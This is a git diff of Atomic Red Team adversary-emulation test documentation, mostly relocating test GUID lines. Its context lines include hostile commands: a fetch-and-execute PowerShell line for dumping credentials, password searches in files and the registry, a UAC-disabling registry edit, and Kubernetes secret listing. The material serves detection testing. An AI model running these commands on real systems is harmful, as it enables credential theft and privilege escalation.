## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell - -auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa - PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f627297-6c38-4e7d-a278-fc2563eaaeaa + + + #### Inputs: @@ -186,14 +194,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) - -auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f - PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open + **Supported Platforms:** Windows +**auto_generated_guid:** 3c51abf2-44bf-42d8-9111-dc96ff66750f + + + #### Inputs: @@ -225,14 +235,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories - -auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 - Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch + **Supported Platforms:** Windows +**auto_generated_guid:** f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + + + #### Inputs: @@ -264,16 +276,18 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute - -auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 3be891eb-4608-4173-87e8-78b494c029b7 + + + #### Inputs: @@ -305,14 +319,16 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I
## Atomic Test #8 - Disable UAC using reg.exe - -auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 - Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + + + @@ -336,9 +352,6 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
## Atomic Test #9 - Bypass UAC using SilentCleanup task - -auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 - Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). @@ -350,9 +363,14 @@ And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + **Supported Platforms:** Windows +**auto_generated_guid:** 28104f8a-4ff1-4582-bcf6-699dce156608 + + + #### Inputs: diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index 6188a9e6..7e3aeca4 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -22,13 +22,15 @@ In the wild, malware has disabled tty_tickets to potentially make s
## Atomic Test #1 - Sudo usage - -auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e - Common Sudo enumeration methods. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + + + @@ -50,13 +52,15 @@ sudo vim /etc/sudoers
## Atomic Test #2 - Unlimited sudo cache timeout - -auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc - Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + + + @@ -77,13 +81,15 @@ sudo visudo -c -f /etc/sudoers
## Atomic Test #3 - Disable tty_tickets for sudo caching - -auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 - Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + + + diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 1c8d7ebe..d0fc6f04 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -16,14 +16,16 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
## Atomic Test #1 - Mimikatz Pass the Hash - -auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908 - Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + **Supported Platforms:** Windows +**auto_generated_guid:** ec23cef9-27d9-46e4-a68d-6f75f7b86908 + + + #### Inputs: @@ -68,13 +70,15 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
## Atomic Test #2 - crackmapexec Pass the Hash - -auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 - command execute with crackmapexec + **Supported Platforms:** Windows +**auto_generated_guid:** eb05b028-16c8-4ad8-adea-6f5b219da9a9 + + + #### Inputs: diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 4b9d9a7b..b7dff150 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -18,13 +18,15 @@ Adversaries may also create a valid Kerberos ticket using other user information
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack - -auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 - Similar to PTH, but attacking Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** dbf38128-7ba7-4776-bedf-cc2eed432098 + + + #### Inputs: diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index edb84410..6761c411 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -22,13 +22,15 @@ In cloud and/or containerized environments, authenticated user and service accou
## Atomic Test #1 - Extract Browser and System credentials with LaZagne - -auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 - [LaZagne Source](https://github.com/AlessandroZ/LaZagne) + **Supported Platforms:** macOS +**auto_generated_guid:** 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 + + + @@ -48,13 +50,15 @@ python2 laZagne.py all
## Atomic Test #2 - Extract passwords with grep - -auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 - Extracting credentials from files + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4 + + + #### Inputs: @@ -79,13 +83,15 @@ grep -ri password #{file_path}
## Atomic Test #3 - Extracting passwords with findstr - -auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 - Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e56bf29-ff49-4ea5-9af4-3b81283fd513 + + + @@ -106,14 +112,16 @@ ls -R | select-string -Pattern password
## Atomic Test #4 - Access unattend.xml - -auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3 - Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process. + **Supported Platforms:** Windows +**auto_generated_guid:** 367d4004-5fc0-446d-823f-960c74ae52c3 + + + @@ -134,13 +142,15 @@ type C:\Windows\Panther\Unattend\unattend.xml
## Atomic Test #5 - Find and Access Github Credentials - -auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 - This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803 + + + diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md index 4dcc1d70..a4fb96e6 100644 --- a/atomics/T1552.002/T1552.002.md +++ b/atomics/T1552.002/T1552.002.md @@ -17,13 +17,15 @@ Example commands to find Registry keys related to password information: (Citatio
## Atomic Test #1 - Enumeration for Credentials in Registry - -auto_generated_guid: b6ec082c-7384-46b3-a111-9a9b8b14e5e7 - Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b6ec082c-7384-46b3-a111-9a9b8b14e5e7 + + + @@ -44,14 +46,16 @@ reg query HKCU /f password /t REG_SZ /s
## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry - -auto_generated_guid: af197fd7-e868-448e-9bd5-05d1bcd9d9e5 - Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry entries are found, they will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af197fd7-e868-448e-9bd5-05d1bcd9d9e5 + + + diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index eecb4da5..ff2377b5 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Search Through Bash History - -auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce - Search through bash history for specifice commands we want to capture + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce + + + #### Inputs: diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 2f1e6642..8780b653 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,14 +22,16 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys - -auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 - Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + **Supported Platforms:** Windows +**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696 + + + @@ -49,13 +51,15 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys - -auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 - Discover private SSH keys on a macOS or Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878 + + + #### Inputs: @@ -86,13 +90,15 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP - -auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 - Copy private SSH keys on a Linux system to a staging folder using the `cp` command. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3 + + + #### Inputs: @@ -124,13 +130,15 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync - -auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a - Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + + + #### Inputs: diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index dbbe2d71..718e21a9 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,13 +23,15 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) - -auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. + **Supported Platforms:** Windows +**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + + + @@ -61,17 +63,19 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) - -auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". + **Supported Platforms:** Windows +**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c + + + #### Inputs: diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index d0d3f03b..9bcf155c 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -14,13 +14,15 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets - -auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file - -auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - Access the Kubernetes service account access token stored within a container in a cluster. + **Supported Platforms:** Linux +**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f + + + diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 380c0107..82a30cb0 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md @@ -14,13 +14,15 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass - -auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b - Gatekeeper Bypass via command line + **Supported Platforms:** macOS +**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + + + #### Inputs: diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 182abaad..c1386bca 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,13 +26,15 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL - -auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e + + + #### Inputs: @@ -67,13 +69,15 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu - -auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff + + + #### Inputs: @@ -113,13 +117,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS - -auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 - Creates a root CA with openssl + **Supported Platforms:** macOS +**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + + + #### Inputs: @@ -158,13 +164,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows - -auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 - Creates a root CA with Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1 + + + #### Inputs: @@ -215,13 +223,15 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil - -auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f - Creates a root CA with certutil + **Supported Platforms:** Windows +**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + + + #### Inputs: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index fc2bed9c..805a501a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,13 +14,15 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image - -auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa - Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + **Supported Platforms:** Windows +**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa + + + #### Inputs: @@ -62,15 +64,17 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO - -auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc - Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + **Supported Platforms:** Windows +**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc + + + #### Inputs: diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index bdc572de..76b62aaf 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,9 +12,6 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain - -auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 - ### Keychain Files ~/Library/Keychains/ @@ -26,9 +23,14 @@ auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) + **Supported Platforms:** macOS +**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93 + + + #### Inputs: diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index b460c84c..d780ed3d 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,17 +22,19 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector - -auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 - A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622 + + + #### Inputs: @@ -77,15 +79,17 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies - -auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b - This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. + **Supported Platforms:** macOS +**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b + + + #### Inputs: @@ -111,14 +115,16 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser - -auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 - The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + + + #### Inputs: diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 3e333580..24135db4 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA - -auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b - This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + + + @@ -64,13 +66,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] - -auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3 + + + @@ -90,13 +94,15 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] - -auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240 + + + diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index 807c98bc..19efee24 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,13 +14,15 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL - -auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c - Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. + **Supported Platforms:** Windows +**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c + + + #### Inputs: diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index ba58dac9..c08b28e8 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,15 +14,17 @@ The KDC service runs all on domain controllers that are part of an Active Direct
## Atomic Test #1 - Crafting golden tickets with mimikatz - -auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af - Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + **Supported Platforms:** Windows +**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af + + + #### Inputs: diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index c33a6ec5..a3155891 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -18,18 +18,20 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets - -auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a - This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output + **Supported Platforms:** Windows +**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a + + + diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md index 1e38d8cb..e7a4580a 100644 --- a/atomics/T1559.002/T1559.002.md +++ b/atomics/T1559.002/T1559.002.md @@ -18,13 +18,15 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands - -auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd - Executes commands via DDE using Microsfot Word + **Supported Platforms:** Windows +**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd + + + #### Run it with these steps! @@ -50,13 +52,15 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE - -auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 - When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script + **Supported Platforms:** Windows +**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 + + + @@ -76,9 +80,6 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO - -auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 - TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ @@ -86,9 +87,14 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) + **Supported Platforms:** Windows +**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181 + + + #### Run it with these steps! diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 17ca1c97..a376ff85 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -26,14 +26,16 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
## Atomic Test #1 - Compress Data for Exfiltration With Rar - -auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory + **Supported Platforms:** Windows +**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + + + #### Inputs: @@ -80,14 +82,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar - -auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c - Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c + + + #### Inputs: @@ -131,14 +135,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip - -auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 - Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134 + + + #### Inputs: @@ -185,13 +191,15 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip - -auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 - Note: Requires 7zip installation + **Supported Platforms:** Windows +**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198 + + + #### Inputs: @@ -235,13 +243,15 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
## Atomic Test #5 - Data Compressed - nix - zip - -auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0 + + + #### Inputs: @@ -283,13 +293,15 @@ echo Please set input_files argument to include files that exist
